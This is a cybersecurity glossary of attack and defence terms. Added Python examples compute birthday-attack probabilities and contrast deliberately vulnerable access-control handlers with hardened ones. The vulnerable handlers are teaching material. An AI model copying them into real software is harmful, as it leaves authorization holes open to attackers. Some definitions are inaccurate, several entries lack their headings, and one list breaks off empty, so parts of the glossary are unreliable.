Learn about the commonly used terms in cybersecurity, their definitions, and abbreviations.
Active Attack
This is a type of attack in which a hacker exploits a weakness in a network and changes data on the target. Threat actors can attempt different types of active attacks, such as masquerade, session replay, message modification, Denial of Service (DoS), and Distributed Denial-of-Service (DDoS). In a masquerade attack, a threat actor pretends to be a user of a system in order to obtain access privileges they are not authorized for. A classic example of a masquerade attack is stealing login IDs and passwords through security gaps in programs and bypassing the authentication mechanism. Session replay is an attack in which the threat actor steals an authorized user’s login information and session ID; using these, the hacker gains access and has the authorization to do anything on the user’s account. A message modification attack is one in which a hacker intercepts a message and sends it to an entirely different destination or modifies the data on a target system. In a Denial of Service (DoS) attack, users are prevented from accessing a network or a web resource; this is achieved by hitting the target with more traffic than it can handle, thereby disrupting its normal function. In a Distributed Denial-of-Service (DDoS) attack, multiple compromised systems gang up to attack a single target; the group of compromised systems is also known as a botnet or zombie army.
Acunetix
Acunetix is a web application testing tool that automatically detects vulnerabilities by analyzing the entire website. The scanner is used as a vulnerability management tool and provides technical and compliance reports.
Advanced Persistent Threat (APT)
A dangerous threat to enterprises in which the threat actor has the sophisticated expertise needed to remain within the system or network for an extended period without being identified. The goal of this kind of threat is usually data theft rather than damage to the company network. The typical modus operandi of an advanced persistent threat is to access the network in several phases: first hacking into the network without being detected, then planning the attack, mapping the data, and finally stealing sensitive data. There is nothing accidental about this type of attack; it is highly customized and carefully planned.
Adware
Adware is a kind of malicious software that displays unwanted advertisements to users. On most occasions, these are pop-ups or ads that cannot be closed. Sometimes adware also strikes through browser redirects. Once the user clicks on such an advertisement, new tabs open on their own in the browser, the home page changes, the search engine is affected, and the user may be led to websites that are not safe to open. Adware typically hijacks the system and presents the user with advertisements for goods and services tailored to their location and behavior patterns. Adware is generally considered a nuisance, but it becomes potentially dangerous when its authors sell the user’s information to a third party who will target them through customized ads and breach their security.
Antivirus Software
Antivirus software is software designed to scan computers, servers, or devices and remove malware or virus infections such as botnet agents, spyware, rootkits, and keyloggers. It can integrate both automated and manual filtering abilities. Antivirus software is distributed in various forms, including standalone antiviruses and internet security suites, which extend protection with firewall and privacy controls.
Techniques used by hackers and threat actors to gain access to and infiltrate your system. The attack method used by threat actors varies according to the technology, the intent, and the motive behind the attack. The most common types of attacks that threat actors use are phishing (spear and whale), malware (ransomware, Trojan, drive-by attack), web attacks (injection, cross-site scripting, malicious file upload), Distributed Denial-of-Service (DDoS), password attacks, eavesdropping attacks, birthday attacks, brute-force and dictionary attacks, insider threats, AI-powered attacks, man-in-the-middle attacks, etc.
Attack Pattern
An approach or methodology used by threat actors and hackers to exploit a vulnerability. Attack patterns are as diverse as the vulnerabilities that exist within a system or network. They leverage inherent weaknesses in its architecture to attack, exploit, and breach security in order to steal data and gain access.
Attack Surface
An attack surface is the set of pathways through which an attacker attempts to enter a system, system element, or environment, or to extract data from it, in order to carry out a cyberattack. The attack surface can be of two types: physical and digital. A physical attack surface covers access to all endpoint devices such as desktops, mobile devices, laptops, USB ports, and improperly disposed hard drives. A digital attack surface includes the entirety of all vulnerabilities that exist in connected hardware and software.
Attack Surface Management
Attack Surface Management (ASM) is the continuous discovery, inventory, classification, prioritization, and security monitoring of your digital ecosystem. With this complete view of the organization’s digital ecosystem, one can discover the cyber risk associated with each vulnerability, quickly remediate any risk exposure, and improve the organization’s cybersecurity posture.
Authentication
This is a security measure designed to verify the identity of a user, process, or device as a precondition for allowing access to confidential data or systems. Primarily, it is used to validate a user before access is authorized.
Backdoor
A backdoor is an undocumented entry point that allows a threat actor to access an entity’s asset by bypassing its security. At times, it is also created by developers to quickly obtain remote access and make changes to the software’s code.
Behavior Monitoring
Behavior monitoring continuously watches for unusual modifications to the operating system or to an installed program. It observes user activities, information systems, and processes, and measures them against organizational policies and rules. Behavior monitoring defends endpoints through Malware Behavior Blocking and Event Monitoring. Malware Behavior Blocking observes system behavior over a period of time and offers an essential layer of threat protection by identifying programs that exhibit malicious behavior and blocking the associated programs. Event Monitoring is a fundamental approach to protecting against unauthorized software and malware attacks: it monitors system areas for specific actions and allows administrators to control the programs that trigger such actions.
Birthday Attack
A birthday attack belongs to the class of brute-force cryptographic attacks and is based on probability theory. The mathematics behind the birthday attack is used to find collisions, two different inputs that produce the same output, among the random-looking values (such as hash digests) exchanged between two communicating parties. According to probability theory, the birthday paradox gives the probability that, in a set of ’n’ randomly selected individuals, some pair will share the same birthday.
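The birthday bound described above, worked through as an added example (not part of the glossary): it computes the exact and approximate collision probabilities, the number of samples needed to reach a target probability, the resulting collision resistance of a digest, and checks the bound empirically against a constructed 16-bit truncation of SHA-256.

```python
"""Birthday-bound calculations for choosing collision-resistant output sizes.

Added example (not from the glossary). The toy hash at the bottom is SHA-256
truncated to a few bits, constructed here only to make the bound observable.
"""
import hashlib
import math


def collision_probability(n: int, space: int) -> float:
    """Exact probability that at least two of n uniformly random values drawn
    from `space` possibilities coincide (the birthday paradox)."""
    if n > space:
        return 1.0  # pigeonhole principle: a collision is certain
    p_all_distinct = 1.0
    for i in range(n):
        p_all_distinct *= (space - i) / space
    return 1.0 - p_all_distinct


def approx_collision_probability(n: int, space: int) -> float:
    """Standard approximation 1 - exp(-n(n-1)/(2*space)); accurate when n << space."""
    return 1.0 - math.exp(-n * (n - 1) / (2.0 * space))


def samples_for_probability(p: float, space: int) -> float:
    """Number of random samples needed to reach collision probability p.
    For p = 0.5 this is about 1.18 * sqrt(space): a b-bit digest resists
    birthday collisions only up to roughly 2**(b/2) evaluations."""
    return math.sqrt(2.0 * space * math.log(1.0 / (1.0 - p)))


def effective_collision_bits(digest_bits: int) -> int:
    """Work factor (in bits) of a generic birthday attack on a digest of the
    given length: half the digest length. This is why a 256-bit digest is
    chosen when 128-bit collision resistance is required."""
    return digest_bits // 2


def first_collision_in_truncated_hash(truncate_bits: int = 16) -> tuple:
    """Empirically observe the birthday bound on a toy hash: SHA-256 truncated
    to `truncate_bits` bits, fed with constructed inputs b"msg-0", b"msg-1", ...
    Returns (draws_until_collision, input_a, input_b, shared_truncated_digest).
    With 16 bits the expected number of draws is about 1.25 * sqrt(2**16) ~ 320."""
    seen = {}
    mask = (1 << truncate_bits) - 1
    i = 0
    while True:
        msg = b"msg-%d" % i
        digest = int.from_bytes(hashlib.sha256(msg).digest(), "big") & mask
        if digest in seen:
            return i + 1, seen[digest], msg, digest
        seen[digest] = msg
        i += 1


if __name__ == "__main__":
    print("23 people, 365 days:", round(collision_probability(23, 365), 4))
    print("samples for p=0.5 on 128-bit space:", samples_for_probability(0.5, 2 ** 128))
    print("collision resistance of SHA-256:", effective_collision_bits(256), "bits")
    draws, a, b, d = first_collision_in_truncated_hash(16)
    print("16-bit toy hash collided after", draws, "draws:", a, b, hex(d))
```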
Black Hat Hacker
A black hat hacker penetrates networks maliciously, exploiting vulnerabilities in systems and networks to discover sensitive information for personal gain.
Black Box Testing
Black box testing is a method of testing software that is performed without any knowledge of the system’s implementation, structure, or design.
Blacklist
A blacklist is a list of blocked components, such as e-mail addresses, users, passwords, URLs, IP addresses, domain names, and file hashes. When an e-mail sender is blacklisted, delivery of its messages remains blocked and the user is restricted from sending messages to the intended recipient. An organization might also blacklist peer-to-peer file sharing on its systems, or specific websites or applications. Contrary to a blacklist, a whitelist permits the listed components through whatever security gate is being used.
Block Cipher
In cryptography, a block cipher is a symmetric algorithm that encrypts and decrypts its input one block at a time instead of one bit at a time. During encryption, the shared key is used to convert plaintext input into ciphertext (encrypted text); during decryption, the same key is used to convert the ciphertext back into the original plaintext.
Blue Team
A blue team is a group of defenders who run analyses, detect security flaws in information technology, check the effectiveness of security measures, and implement defensive measures against future attacks. They constantly strengthen the security around and within the organization’s data systems and networks. Usually, the blue team is the internal security team of an organization that defends against real attackers.
Botnet
A botnet is a set of internet-connected devices infected by malware and controlled by an attacking party. Botnet owners can command and control thousands of computers to carry out malicious activities. Common botnet actions include email spam, distributed denial-of-service (DDoS) attacks, and targeted intrusions.
Breach
A breach occurs when a hacker successfully exploits a vulnerability in a computer or device to intrude into a system and gain access to its files and networks.
Bug
A bug, or software error, is a defect that causes a program to deliver unexpected output or crash entirely. A malicious attacker can exploit a security bug to gain unauthorized access to the system. Bugs may also affect application performance, and developers need to fix all identified bugs before deploying the next version of the application software.
Burp Suite
Burp Suite, developed by PortSwigger, is a popular penetration testing tool used to evaluate the security of web applications. It is also one of the most widely used web vulnerability scanners. In the initial mapping and analysis of an application’s attack surface, Burp Suite is used to identify vulnerabilities. It can also intercept HTTP and HTTPS requests, acting as an intermediary between the user and web pages.
Business Continuity Plan (BCP)
A Business Continuity Plan (BCP) is a document that describes how an organization will operate during a disruptive incident. It comprises the processes of prevention and recovery for dealing with potential threats and disasters. The BCP plays an important part in the risk management strategy.
Catfishing
Catfishing is a type of identity fraud in which a cybercriminal creates a fake online identity to lure someone into a relationship and exploit them. The catfish often uses personally identifiable information, photos, and posts to make the profile seem more genuine to the victim.
Clickjacking
Clickjacking is a user interface redress attack in which an attacker hijacks a user’s clicks on a website, redirecting them to something malicious or to the disclosure of confidential information, so that the user performs actions they are unaware of. This is a type of online manipulation in which hackers hide malware or malicious code behind a legitimate-looking control on a website.
Clone Phishing
In this type of phishing attack, a legitimate email from an individual or organization is replicated and sent to the target with malicious links or virus-laden attachments. In the target’s inbox, it appears as a re-sent email. When the victim clicks on the attached link, malware or ransomware is installed on the system. A phisher can use clone phishing to gain access to one of the organization’s computing systems and then infect other systems.
Closed Source Software (CSS)
Closed source software, also known as proprietary software, has its source code encrypted and hidden from the public.
Cloud
A cloud is a platform that stores large amounts of information and data remotely instead of on a local server. Basically, the cloud provides remote storage and sharing of files and data wherever an internet connection is available.
Common Vulnerabilities and Exposures
A Common Vulnerabilities and Exposures (CVE) entry is an alphanumeric ID assigned by a CVE Numbering Authority (CNA) to refer to a specific software or hardware vulnerability. Once the vulnerability is identified and analyzed, it is listed publicly in the MITRE CVE list. The information is then added to the National Vulnerability Database (NVD).
Common Vulnerability Scoring System
Common Vulnerability Scoring System (CVSS) is a standard scoring scale of 0–10 that rates the severity and impact of vulnerabilities so that they can be prioritized. Vendors release patches and updates for vulnerabilities based on the assigned CVSS score. The most recent version is CVSS 3.1. The following table presents its breakdown.
| Rating   | CVSS v3 Score |
|----------|---------------|
| Critical | 9.0 – 10      |
| High     | 7.0 – 8.9     |
| Medium   | 4.0 – 6.9     |
| Low      | 0.1 – 3.9     |
Common Weakness Enumeration
Common Weakness Enumeration (CWE) is a global categorization system for weaknesses found in software and hardware. The list, maintained by the MITRE Corporation and sponsored by the National Cybersecurity FFRDC, contains over 600 weakness types. It gives users an understanding of the issues in their software and helps in the development of automated tools to identify, fix, and prevent these issues.
Each of the CWE is classified with an ID and description that gives an overview of the vulnerability type. Some of the categorized vulnerabilities are buffer overflows, path/directory tree traversal errors, cross-site scripting, privilege escalation, and SQL injection.
Compliance
In cybersecurity, compliance involves meeting the requirements of the rules and regulations enacted by a regulatory authority to protect sensitive data. Compliance requirements vary by industry and sector and comprise different organizational procedures and technologies to safeguard data. Bodies and standards such as the Center for Internet Security (CIS), the National Institute of Standards and Technology (NIST) under the United States Commerce Department, and ISO 27001 define compliance requirements.
Computer Network Defense
Computer Network Defense (CND) is the set of procedures and defensive measures that a system operates to identify, observe, analyze, and respond to intrusions. The primary objective of Computer Network Defense is to ensure that no unauthorized or illegitimate user or application has access to a confidential IT environment or network.
Computer Security Incident
An incident that results in potential harm to the confidentiality, integrity, or availability of the information that a system processes, stores, or transmits, or that constitutes a violation, or imminent threat of violation, of security guidelines, security procedures, or acceptable use policies. Attacks such as unauthorized access by someone who is not allowed to use a computer system are also deemed potentially threatening computer security incidents. When an incident modifies a computer system, a computer security incident response team (CSIRT) must be activated to support the response and regain control while minimizing the damage.
Cookie
A cookie is a piece of information stored on a user’s computer by a web server while the user browses a website. Cookies are vital in making website visits more helpful, but they are still a threat to the user’s privacy. Commonly, they are used to rotate banner ads and to customize pages for the user with the information provided. Cookies can be viewed on the hard disk.
Cross-Site Request Forgery
Cross-Site Request Forgery (CSRF), also known as session riding, is a common web application vulnerability in which an attacker tricks a user into performing unwanted actions on a web application to which the user is logged in. The attacker carries out a successful CSRF attack by forging requests such as transferring funds, changing the user’s email address or password, and so forth.
Cryptojacking
Cryptojacking is a type of cybercrime in which hackers hijack a victim’s computing resources to mine cryptocurrency using crypto-mining scripts. This is accomplished by getting the victim to click on a malicious link in an online advertisement or email, or by infecting a website so that it auto-executes the script once loaded. Cryptojacking scripts are usually deployed in web browsers.
Cyber Espionage
Cyber espionage is a type of cyberattack carried out against government organizations or competing companies. Ultimately, cyber espionage is performed to spy on and steal sensitive information with the intention of exploiting it for political or competitive gain.
Cyber Supply Chain Risk Management
Cyber Supply Chain Risk Management aims to find, evaluate, prevent, and mitigate the risk associated with the distributed and interconnected type of Information and Communications Technology product and service supply chains.
Data Breach
A data breach is a security intrusion in which secure and confidential data, such as Personal Health Information (PHI), Personally Identifiable Information (PII), organizational trade secrets, intellectual property, and financial data, is exposed to an unauthorized party or environment. The data leak or unauthorized access may also result from the careless disposal of used computer equipment and data storage media.
Data Leakage
Data leakage is the illegitimate transmission of data from an organization to an external recipient. It usually occurs electronically, or physically through mobile data storage devices such as optical media, USB keys, and laptops.
Data Loss
Data loss occurs when sensitive information on a computer is lost or corrupted due to theft, human error, viruses, malware, or power failure. Causes include laptop theft, accidental deletion, overwriting of files, power outages and surges, spilled liquids, and sudden failure of hard drives.
Data Loss Prevention (DLP)
Data Loss Prevention (DLP) is a policy that ensures end users do not send confidential or sensitive information outside the organization’s network. The strategy involves a combination of users, security policies, and security tools.
Deceptive Phishing
Deceptive phishing attacks are scam emails sent in bulk that request that their victims provide personal details, verify their account, or change an account password. Attackers use deceptive phishing emails in extensive campaigns and exploit those victims who respond to the scam.
Deepfake
A deepfake is a use of artificial intelligence to alter an existing video or picture of a person so that it resembles someone else. This type of visual and audio manipulation is achieved with machine learning techniques. The methods used to create deepfakes are rooted in deep learning and generative neural network architectures, such as autoencoders or generative adversarial networks.
DevSecOps
The merged processes of Development, Security, and Operations are collectively referred to as DevSecOps. It is the practice of continuously implementing automated security within the development and operations stages of an application. It aims to optimize the entire application life cycle, secure code and eliminate vulnerabilities, and ensure faster product delivery by integrating information security from development through deployment.
Digital Attack Surface
The digital attack surface is the total number of security vulnerabilities found outside the firewall that can be accessed through the internet. The possible entry points of vulnerabilities are unnecessary open ports, poor email security, code, servers, and websites.
DNS Based Phishing
A DNS-based phishing attack, also known as pharming, involves hackers using a duplicate of a legitimate website to acquire the user’s IP address. DNS is normally used in a network to translate domain names into IP addresses for computer communication. In this type of attack, users remain unaware that they are entering their personal information into a fraudulent website to which they have been redirected, giving long-term access to the attacker.
Domain Name
A domain name is an internet or web address that forms part of a URL, consisting of a name (domain) followed by an extension (.com), and identifies the computers hosting the website.
Encryption
Encryption is the process of converting information, or a message referred to as plaintext, into an unreadable form called ciphertext by using an encryption algorithm.
Enterprise Risk Management
Enterprise risk management (ERM) is a plan-based business strategy to detect, evaluate, and prepare for any threats, vulnerabilities, and other potential disasters that may interfere with an organization’s operations and objectives. ERM governs the activities of an organization to reduce the impact of threats on its finances and profits.
Event Monitoring
Event monitoring is a fundamental approach to protecting against unauthorized software and malware attacks. It monitors system areas for specific events, allowing administrators to control the programs that trigger such events.
Exploit
An exploit is any piece of code designed to take advantage of security flaws or software vulnerabilities. Such code is typically written by security researchers as a proof of concept or crafted by threat actors for malicious operations. Exploits enable attackers to gain elevated access to a network and can help them move laterally to compromise an organization’s entire IT infrastructure. Common exploits include SQL Injection, Cross-Site Scripting, and Cross-Site Request Forgery.
Exploit Kit
Exploit kits are malicious toolkits developed by hackers to automatically exploit known vulnerabilities in software and systems. Each kit contains a collection of automated exploits that can be rapidly deployed to launch an attack. Exploit kits are popular remote access tools and are used in mass malware attacks because of their highly automated nature, which lowers the barrier for attackers to silently enter a network.
Exploitation Analysis
Exploitation analysis is the systematic assessment of all collected information to identify any vulnerabilities and gaps with the potential for exploitation.
Firewall
A firewall is a network security device that monitors incoming and outgoing network traffic. It is the first line of defense in cybersecurity and acts as a barrier between a private, trusted network and an untrusted source (such as the Internet). Based on structure and functionality, firewalls can be of different types, such as:
- Packet-filtering firewalls
- Next-generation firewalls
- Stateful multilayer inspection firewalls
- Host-based firewalls
Forensics
Forensics is the application of scientific methods to the detection of crime. Cyber forensics applies these methods to identify and present digital evidence of crime.
Grey Hat Hacker
A grey hat (or gray hat) hacker is a computer security expert who violates laws or common ethical principles but does not have the malicious intent typical of a black hat hacker. They share the white hat’s intention of maintaining secure systems, but act without permission.
Greylist
A greylist is a method of protecting e-mail users against spam. It comprises items such as e-mail addresses, users, passwords, URLs, IP addresses, domain names, and file hashes that are temporarily blocked or allowed until an additional verification step is completed.
Hacker
A hacker is an individual who breaks through the security of a network or system to steal data, corrupt systems or files, take over the environment, or disrupt data-related activities by means of phishing scams, spoofing, Trojan horses, vulnerability scanning, viruses, etc. Ethical hackers, on the contrary, are employed by organizations to prevent malicious infections.
Hashcat
Hashcat is a password-cracking tool that had a proprietary codebase until 2015, when it was released as open-source software. It performs different types of attacks, including brute-force and dictionary attacks, against password hash values.
Honeypot
In cybersecurity terminology, a honeypot is a security system that serves as a decoy for attackers. It lures hackers and wastes their time as they try to gain unauthorized access to the network.
ICT Supply Chain Threat
An Information and Communications Technology (ICT) supply chain threat is a human-made threat in which an adversary compromises the confidentiality, integrity, or availability of a system or of the information the system handles, stores, or transmits. The threat can arise at any point in the system development life cycle of the product or service. Cyber Supply Chain Risk Management is the method of finding, evaluating, preventing, and mitigating the risk associated with the distributed and interconnected nature of ICT product and service supply chains.
Identity Cloning
Identity cloning is a type of identity theft in which an individual impersonates someone else in order to hide their true identity.
Incident
An incident is an act that violates an organization’s security policy and affects the integrity of its information systems, services or networks, and sensitive information through unauthorized access. It results in adverse outcomes for the information that the system holds and requires a response action to mitigate the consequences. Incidents can include security issues, application bugs, data issues, system outages, server problems, etc.
Incident Management
Incident management is an area of service management that is activated when an incident has occurred. Its key objective is to restore normal service operations at the earliest possible time. Incidents include disruptions reported by users or technical staff, or automatically detected and reported by event monitoring tools. When incidents are reported, the incident management process attempts to understand the impact and urgency of the incident and respond accordingly.
Internet Protocol Addresses
An Internet Protocol (IP) address is a numerical identifier allocated to each computer connected to the internet. IP addresses enable computers to send and receive information and can also be used to track down a user’s location. IP addresses are written in a standard notation and are assigned by network administrators.
Java Serialization
Java serialization is a built-in feature by which a Java object is converted into a byte stream so that it can be transferred from one Java virtual machine to another and reconstructed there through the process of deserialization. Java serialized data streams support encryption, compression, authentication, and secure Java computing.
Jump Bag
A jump bag is a container holding the essential items needed to respond to an incident, reducing the effects of a delayed reaction.
Keylogger
A keylogger is a sneaky type of spyware that records and steals the keystrokes a user enters on a device. Keyloggers are not always illicit to install and use: they are a common tool that corporate IT departments use to troubleshoot technical problems on their systems and networks or to keep an eye on employees secretly. A keylogger can record online conversations, e-mails, password logins, screenshots, web pages that you view, and sensitive financial information.
Lateral Movement
Lateral movement is a set of techniques used by sophisticated cyber-attackers to gradually move sideways through a network in search of targeted critical data and assets. This methodology additionally requires user account credentials. In this type of attack, threat actors may gain access to the domain controller, which gives them control over the Windows-based infrastructure; doing so requires careful strategy to evade detection. To mitigate lateral movement attacks, security analysts can build internal network intelligence to know which users and devices are on the network and what the standard login patterns are, so that credential misuse can be identified when it occurs.
Macro Virus
A macro virus is a virus written in the macro programming language used by software applications (Excel, Word); it causes malicious programs to run as soon as a document is opened, because the virus alters the application’s macro commands. Two well-known macro viruses are the Concept virus, which targets Microsoft Word, and the Melissa virus, which spreads through e-mail. A macro virus can generate new files, corrupt data, move text, send files, format hard drives, and insert pictures. One of their standard operations is delivering destructive viruses and malware.
Malicious Applet
A malicious applet is a small application program that attacks the local system of a web user. Any applet that performs an action against the will of the Java user should be considered a malicious applet. Malicious applets can cause denial of service, invasion of privacy, annoyance, and damage to Java users. Such applets may, for example, play sound files continuously, set up threads that monitor your web use, or display unwanted graphics on your screen.
Malicious Code
Malicious code is system code or web script intended to create undesired vulnerabilities or application backdoors, cause security breaches or damage to a system, and potentially lose data. Unfortunately, not all types of malicious code can be detected by anti-virus applications on their own. Malicious code takes the form of Java applets, ActiveX controls, scripting languages, browser plug-ins, and pushed content. Malicious code can give a user remote access to a computer; this is known as an application backdoor.
Malware
Malware is used to hide the hacker’s footprints within the system, and it also helps the attacker control their access remotely and identify the data they wish to steal.
Malware Based Phishing
In malware-based phishing, an attacker utilizes a duplicated email or fake website to lure victims into clicking on download links that will install malware in the victim’s computing system. The installed malware can use keylogger and screen logger programs to record keyboard strokes for account logins and passwords and track the user’s actions. These recorded actions are transmitted to the attacker, who will then use the information to exploit the target.
Malware Behavior Blocking
Malware Behavior Blocking observes system behavior over a period of time and offers an essential layer of threat protection by identifying programs that exhibit malicious behavior and blocking the associated applications.
Metasploit
Metasploit is a widely used penetration testing tool that provides information on security vulnerabilities. It simplifies probing and infiltrating a network or server, which aids both blue and red teams.
Network Resilience
Network resilience is the capability of a network to defend itself, maintain a level of service and recover rapidly when failures occur, and meet unpredictable demands. To increase resilience, the possible challenges and risks must be identified, and proper resilience measures defined.
NOP Sled
A NOP sled, NOP slide, or NOP ramp is a sequence of no-operation (NOP) instructions that carries the CPU’s execution along to a desired destination. This technique is commonly used in software exploits to direct program execution when the target of a branch instruction is not known precisely. A branch instruction is a program instruction that causes a system to execute a different instruction sequence, departing from its default behavior of executing instructions in order.
Obfuscation
Obfuscation is the process of transforming program code into a complicated form while the program’s function remains the same. The purpose of obfuscation is to secure data, anonymize cyberattacks, and defend programs from threat actors. It makes the program challenging for hackers to detect and analyze.
Outsider Threat
An outsider threat is an unauthorized group or individual from outside the organization who seeks and obtains access to the organization’s sensitive information. External attackers are numerous and include well-funded hackers, organized crime groups, etc. The primary objective of an outsider threat is cyber espionage: spying on protected data and confidential information.
Open Web Application Security Project (OWASP)
The Open Web Application Security Project (OWASP) is an organization that provides a regularly updated list of the most persistent application security concerns. Security experts from around the world are members of this project and they contribute their knowledge of threats, weaknesses, and countermeasures and help the industry by building awareness about software vulnerabilities.
Packet Sniffing
When data is transmitted over a network, it is broken into smaller units called data packets at the sender’s node and reassembled into its original form at the receiver’s node. The process of capturing these data packets by intercepting the traffic on a network is called packet sniffing. A packet sniffer is also called a packet analyzer or network analyzer.
A passive attack is a type of cyber-attack where the threat actor simply observes the network activity as a part of surveillance. A passive attacker aims to obtain information that is transmitted. They are not easily detected because threat actors do not actively attack any target machine or participate in network traffic. They can also monitor every single message or data that is sent or received in the communication, but they cannot modify the original message.
Penetration testing is a cybersecurity test performed by the security team to attack against your computer system to analyze for exploitable vulnerabilities. It is best to have a penetration test done by security experts because they may be able to expose blind spots undetected by the developers who built it. The penetration test is performed by the contractors referred to as ethical hackers. The penetration tester runs several tests based around network penetration, penetration methods, and complete assessment reports about what they have revealed.
Phone phishing, one of the most commonly used phishing attacks, attempts to trick the user with attention-grabbing text messages demanding their immediate action. Typically, these messages ask the user to pay a registration fee and/or share their personal and financial details. For instance, phishers can trick users into believing that they have won a prize, and need to share personal information to claim it. When threat actors resort to using voice messages or phone calls to scam their target, it is referred to as vishing.
Physical Attack Surface
When an attacker uncovers security vulnerabilities by obtaining physical access to a system or device, for example in a server room or through office equipment, the sum of weaknesses reachable through physical access is known as the physical attack surface.
An attacker can gain such access through careless disposal of user data and login credentials, physical break-in, rogue employees, social engineering ploys, and intruders who tailgate staff through doors. Organizations reduce their physical attack surface with surveillance of the physical environment and access control such as badges, locks, and visitor escorts.
Privilege escalation is the act of gaining a level of access to system resources beyond what was granted, by exploiting a programming error, design flaw, or access-control misconfiguration in an operating system or application. There are two forms. Horizontal privilege escalation: the threat actor, holding an ordinary account, gains access to another user's data or functions at the same privilege level, for example by tampering with an object identifier in a request. Vertical privilege escalation: the threat actor uses a compromised account to obtain higher privileges than it legitimately holds, such as moving from a normal user to an administrator or root.
Ransomware is malware that disrupts a user's computer or server by installing itself and encrypting or locking access to data, then displaying a message that demands a ransom for its return. Several categories exist: 1. Encryptors, which block access to data and applications by encrypting files or whole devices. 2. Lockers, which block access to the computer system itself. 3. Scareware, which claims to have found other malware such as viruses on the computer and demands money to remove it. 4. Doxware (leakware), which steals sensitive information from the computer and threatens to publish it.
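An added example (not from the original page) of both forms in application code, using a constructed invoice table and hypothetical handler names. The vulnerable handlers show the two classic mistakes: an object lookup by caller-supplied id with no ownership check (horizontal), and a role taken from a client-controlled field (vertical). The hardened handlers make every decision from the authenticated principal held in the server-side session.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    role: str            # "user" or "admin", taken from the server-side session


class Forbidden(Exception):
    """Raised when the caller is not allowed to perform the operation."""


# Constructed sample data: invoices keyed by id, each owned by one user.
INVOICES = {
    1001: {"owner_id": 1, "total": 120.00},
    1002: {"owner_id": 2, "total": 980.50},
}


# Vulnerable, horizontal: the record id comes from the request and ownership
# is never checked, so user 1 reads user 2's invoice just by changing the id.
def get_invoice_vulnerable(current: User, invoice_id: int) -> dict:
    return INVOICES[invoice_id]


# Vulnerable, vertical: the role is read from a client-controlled field
# (a form value, cookie or unverified token claim), so anyone can claim "admin".
def admin_report_vulnerable(role_from_request: str) -> dict:
    if role_from_request != "admin":
        raise Forbidden()
    return {"invoice_count": len(INVOICES)}


# Hardened: authorisation is decided from the session principal, not request data.
def get_invoice(current: User, invoice_id: int) -> dict:
    inv = INVOICES.get(invoice_id)
    if inv is None or (inv["owner_id"] != current.id and current.role != "admin"):
        raise Forbidden()        # same answer for "missing" and "not yours": no id oracle
    return inv


def admin_report(current: User) -> dict:
    if current.role != "admin":
        raise Forbidden()
    return {"invoice_count": len(INVOICES)}


def can_read(handler, current: User, invoice_id: int) -> bool:
    """True if `handler` lets `current` read `invoice_id` (for comparing the two versions)."""
    try:
        handler(current, invoice_id)
        return True
    except (Forbidden, KeyError):
        return False


def can_run_report(handler, *args) -> bool:
    try:
        handler(*args)
        return True
    except Forbidden:
        return False


if __name__ == "__main__":
    alice = User(1, "user")
    print("horizontal, vulnerable:", can_read(get_invoice_vulnerable, alice, 1002))
    print("horizontal, hardened:  ", can_read(get_invoice, alice, 1002))
    print("vertical, vulnerable:  ", can_run_report(admin_report_vulnerable, "admin"))
    print("vertical, hardened:    ", can_run_report(admin_report, alice))
```

Returning the same Forbidden response for a foreign id and a non-existent id matters: a different response for each lets an attacker enumerate which ids exist before trying to read them.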
Risk-Based Vulnerability Management (RBVM)
Risk-Based Vulnerability Management (RBVM) is a cybersecurity strategy that prioritizes remediation according to the risk each vulnerability actually poses, rather than by raw severity score alone, in order to reduce exposure across the attack surface. RBVM combines asset criticality, vulnerability severity, and observed threat-actor activity (often with automated scoring and, in some products, machine learning), assesses each vulnerability in its threat context, and provides insight into the potential business impact of each one. Through this process an organization can track its cyber resilience and direct remediation effort where it improves security posture most.
Recovery is the restoration of data and services after an incident or event, in the short term (getting systems running again) or the long term (returning to normal operations). The incident may be a natural disaster or a cyber-attack.
A red team is a group of ethical hackers who attack an organization's layered security controls while its blue team defends them. Their objective is to discover and exploit weaknesses in the organization's security by emulating a real adversary's tactics, techniques, and procedures against its security posture.
A rootkit is a set of malicious tools that give an attacker privileged access to restricted parts of a computer or system while hiding their presence from the user and from security software. It can be installed remotely as part of a malware infection and gives complete control over the device. Rootkits often bundle or conceal other malicious components, such as keyloggers, banking-credential and password stealers, antivirus disablers, and bots used in Distributed Denial of Service (DDoS) attacks.
Software-as-a-Service (SaaS) is cloud-based software delivered to organizations as a subscription service, without the need to purchase the application, servers, or platform. SaaS providers offer business services such as Customer Relationship Management (CRM), Enterprise Resource Planning (ERP), billing, and sales.
It is the machine-based execution of security tasks, with the ability to detect, investigate, and remediate cyber threats with or without human intervention, by identifying incoming risks, triaging and prioritizing alerts as they emerge, and responding to them in a timely fashion.
Security testing is the process of evaluating computer networks, software, applications, and systems to identify weaknesses that an intruder could exploit. It aims to improve cyber defences by surfacing vulnerabilities, risks, and threats using manual techniques and automated testing tools. Penetration testing is a typical example of security testing.
Typically, security testing of information systems follows these six basic principles:
Server-Side Request Forgery (SSRF)
Server-Side Request Forgery (SSRF) is a web security vulnerability in which the attacker induces the server-side application to make a request to a destination of the attacker's choosing: back to the server itself, to other services inside the organization's infrastructure, or to external third-party systems. The vulnerable application imports data from a URL, posts data to a URL, or otherwise acts on a URL that the attacker can tamper with. Typical targets are services that are reachable only from inside the network and therefore trust any caller, such as admin interfaces and cloud instance-metadata endpoints.
In session hijacking, an attacker takes over a user's session by compromising the web application's session-control mechanism. The attacker needs the user's session identifier, which can be obtained by stealing the session cookie (through cross-site scripting, sniffing an unencrypted connection, or malware on the client) or by predicting a weakly generated identifier. The attack is common against browser sessions and web applications: an attacker who captures a user's online-banking session gains the same access as that user.
Shift Left is an approach to security testing that moves testing earlier in the Software Development Life Cycle. The intention is to detect security defects and vulnerabilities at the earliest stage, when they are cheapest to fix, and so improve the quality and security of the software. It reduces late surprises and helps deploy the application on schedule.
Spear phishing is a phishing attack against a specific, well-researched target, aimed at obtaining sensitive data such as financial credentials or personal identification information, or at gaining access to the target's computer system. The threat actor impersonates a trusted entity and reaches the target through email, text, or instant message.
Spoofing is forgery in which the sending address of a transmission is falsified to gain illegitimate entry to a secure system or to deceive the recipient. IP spoofing and e-mail spoofing are the common forms: an e-mail that appears to come from the user's bank, or from any other source the user trusts, can be crafted and sent by an attacker.
Spyware is software that collects information about an individual or organization without their knowledge and sends the sensitive or confidential data it gathers to another party for malicious use.
